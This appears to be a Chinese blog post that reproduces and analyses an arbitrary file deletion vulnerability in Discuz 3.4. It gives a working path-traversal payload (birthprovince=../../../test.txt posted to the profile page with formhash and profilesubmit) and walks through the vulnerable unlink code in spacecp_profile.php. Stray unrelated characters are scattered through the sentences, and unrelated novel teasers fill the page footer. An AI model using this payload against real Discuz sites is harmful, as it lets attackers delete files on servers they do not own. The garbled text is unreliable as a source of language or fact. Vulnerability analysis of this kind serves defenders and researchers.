Discuz 3.4漏洞

漏洞復現(xiàn)

網(wǎng)上內(nèi)容
首先在目錄里建立test.txt
然后,獲取formhash:7b2bf0ce


于是可以構(gòu)建payload:

http://127.0.0.1/home.php?mod=spacecp&ac=profile&op=base
[post] birthprovince=../../../test.txt&profilesubmit=1&formhash=7b2bf0ce

然后上傳文件买置,就可以刪除這個test.txt了

漏洞分析

我們來看下源碼速警,這里主要是spacecp_profile.php的問題
首先叹誉,我們從漏洞出發(fā),我們先從刪除函數(shù)開始:

#178
if($_GET['deletefile'] && is_array($_GET['deletefile'])) {
        foreach($_GET['deletefile'] as $key => $value) {
            if(isset($_G['cache']['profilesetting'][$key]) && $_G['cache']['profilesetting'][$key]['formtype'] == 'file') {
                @unlink(getglobal('setting/attachdir').'./profile/'.$space[$key]);
                @unlink(getglobal('setting/attachdir').'./profile/'.$verifyinfo['field'][$key]);
                $verifyarr[$key] = $setarr[$key] = '';
            }
        }
    }

可以看到闷旧,這個要求formtype是file长豁,就會觸發(fā)unlink
我們發(fā)現(xiàn)這次改動的228行有@unlink(getglobal('setting/attachdir').'./profile/'.$space[$key]);,也就是這次漏洞所在忙灼,我們看看語句成立的條件

if($_FILES) {
        ......省略
            if(!$upload->error()) {
                $upload->save();

也就是上傳文件匠襟,那么現(xiàn)在就是看看這個$space[$key]了,回溯下變量该园,我們發(fā)現(xiàn)酸舍,key是可以被payload里的用戶資料所操作的,我們看下payload里用的birthprovince爬范,

if(isset($_POST['birthprovince'])) {
        $initcity = array('birthprovince', 'birthcity', 'birthdist', 'birthcommunity');
        foreach($initcity as $key) {
            $_GET[''.$key] = $_POST[$key] = !empty($_POST[$key]) ? $_POST[$key] : '';
        }
    }

可以看到這個就可以控制$space[$key],而且沒有什么限制,而一切的條件就是70行的if(submitcheck('profilesubmit')) {所以弱匪,我們的payload會有profilesubmit=1

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末青瀑,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子萧诫,更是在濱河造成了極大的恐慌斥难,老刑警劉巖,帶你破解...
    沈念sama閱讀 218,525評論 6 507
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件帘饶,死亡現(xiàn)場離奇詭異哑诊,居然都是意外死亡,警方通過查閱死者的電腦和手機及刻,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,203評論 3 395
  • 文/潘曉璐 我一進店門镀裤,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人缴饭,你說我怎么就攤上這事暑劝。” “怎么了颗搂?”我有些...
    開封第一講書人閱讀 164,862評論 0 354
  • 文/不壞的土叔 我叫張陵担猛,是天一觀的道長。 經(jīng)常有香客問我,道長傅联,這世上最難降的妖魔是什么先改? 我笑而不...
    開封第一講書人閱讀 58,728評論 1 294
  • 正文 為了忘掉前任,我火速辦了婚禮蒸走,結(jié)果婚禮上仇奶,老公的妹妹穿的比我還像新娘。我一直安慰自己载碌,他們只是感情好猜嘱,可當我...
    茶點故事閱讀 67,743評論 6 392
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著嫁艇,像睡著了一般朗伶。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上步咪,一...
    開封第一講書人閱讀 51,590評論 1 305
  • 那天论皆,我揣著相機與錄音,去河邊找鬼猾漫。 笑死点晴,一個胖子當著我的面吹牛,可吹牛的內(nèi)容都是我干的悯周。 我是一名探鬼主播粒督,決...
    沈念sama閱讀 40,330評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼禽翼!你這毒婦竟也來了屠橄?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,244評論 0 276
  • 序言:老撾萬榮一對情侶失蹤闰挡,失蹤者是張志新(化名)和其女友劉穎锐墙,沒想到半個月后,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體长酗,經(jīng)...
    沈念sama閱讀 45,693評論 1 314
  • 正文 獨居荒郊野嶺守林人離奇死亡溪北,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,885評論 3 336
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了夺脾。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片之拨。...
    茶點故事閱讀 40,001評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖咧叭,靈堂內(nèi)的尸體忽然破棺而出敦锌,到底是詐尸還是另有隱情,我是刑警寧澤佳簸,帶...
    沈念sama閱讀 35,723評論 5 346
  • 正文 年R本政府宣布乙墙,位于F島的核電站颖变,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏听想。R本人自食惡果不足惜腥刹,卻給世界環(huán)境...
    茶點故事閱讀 41,343評論 3 330
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望汉买。 院中可真熱鬧衔峰,春花似錦、人聲如沸蛙粘。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,919評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽出牧。三九已至穴肘,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間舔痕,已是汗流浹背评抚。 一陣腳步聲響...
    開封第一講書人閱讀 33,042評論 1 270
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留伯复,地道東北人慨代。 一個月前我還...
    沈念sama閱讀 48,191評論 3 370
  • 正文 我出身青樓,卻偏偏與公主長得像啸如,于是被迫代替她去往敵國和親侍匙。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 44,955評論 2 355

推薦閱讀更多精彩內(nèi)容